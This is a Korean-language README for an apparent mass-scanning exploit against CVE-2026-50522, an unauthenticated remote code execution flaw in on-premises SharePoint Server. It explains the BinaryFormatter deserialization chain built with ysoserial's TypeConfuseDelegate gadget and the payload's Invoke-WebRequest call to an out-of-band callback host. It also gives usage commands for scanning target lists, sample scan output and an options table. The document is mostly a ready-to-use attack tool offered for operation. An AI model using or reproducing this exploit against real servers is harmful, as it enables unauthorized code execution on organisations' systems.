
CVE-2026-50522 PoC
SecurityContextToken 쿠키 역직렬화를 통한 SharePoint 서버 비인증 원격 코드 실행
CVE-2026-50522를 대상으로 하는 대량 스캔 익스플로잇으로, 온프레미스 Microsoft SharePoint Server를 대상으로 합니다. WS-Federation 엔드포인트 /_trust/default.aspx 에서 안전하지 않은 BinaryFormatter 역직렬화를 악용하여 조작된 SecurityContextToken 쿠키를 통해 비인증 코드 실행을 달성합니다.
참고: 이 프로젝트에는 알려진 침투 테스트 도구인
ysoserial이 포함되어 있으므로 다운로드 중에 바이러스 백신이 이를 플래그하거나 격리할 수 있습니다.
ysoserial.exe가 TypeConfuseDelegate 가젯을 사용하여 BinaryFormatter 직렬화된 페이로드를 생성합니다.Invoke-WebRequest를 실행합니다.SecurityContextToken XML 구조 내에 래핑됩니다.RequestSecurityTokenResponse(WS-Federation)에 포함됩니다.wresult 매개변수가 /_trust/default.aspx에 POST됩니다.requests 라이브러리python CVE-2026-50522.py -t http://10.10.10.5 -c http://YOUR_ID.oastify.com
python CVE-2026-50522.py -T targets.txt -c http://YOUR_ID.oastify.com
python CVE-2026-50522.py -T targets.txt -c http://YOUR_ID.oastify.com --ysoserial C:\tools\ysoserial.exe
python CVE-2026-50522.py -T targets.txt -c http://YOUR_ID.oastify.com -x http://127.0.0.1:8080
python CVE-2026-50522.py -T targets.txt -c http://YOUR_ID.oastify.com --callback-mode subdomain
Path 모드 (기본값):
http://YOUR_ID.oastify.com/10.10.10.5
Subdomain 모드:
http://10.10.10.5.YOUR_ID.oastify.com
[*] 50 target(s) | callback: http://abc123.oastify.com (path) | ysoserial: ysoserial.exe
[10.10.10.5] [+] 200 [LOGIN_PAGE,AUTH_COOKIE]
[10.10.10.6] [!] 200 [AMSI_BLOCKED]
[10.10.10.7] [!] TIMEOUT
[10.10.10.8] [!] SSL_ERR
[10.10.10.9] [!] 403 [HTTP_403]
[*] 45.2s | 50 total | 12 potential | 3 amsi | 5 failed
| 인수 | 설명 | 기본값 |
|---|
-t, --target | 단일 대상 URL | - |
-T, --targets | 대상 URL 파일 (한 줄에 하나씩) | - |
-c, --callback-url | OOB 콜백 기본 URL (필수) | - |
--callback-mode | path 또는 subdomain | path |
--ysoserial | ysoserial.exe 경로 | ysoserial.exe |
-x, --proxy | HTTP 프록시 | 없음 |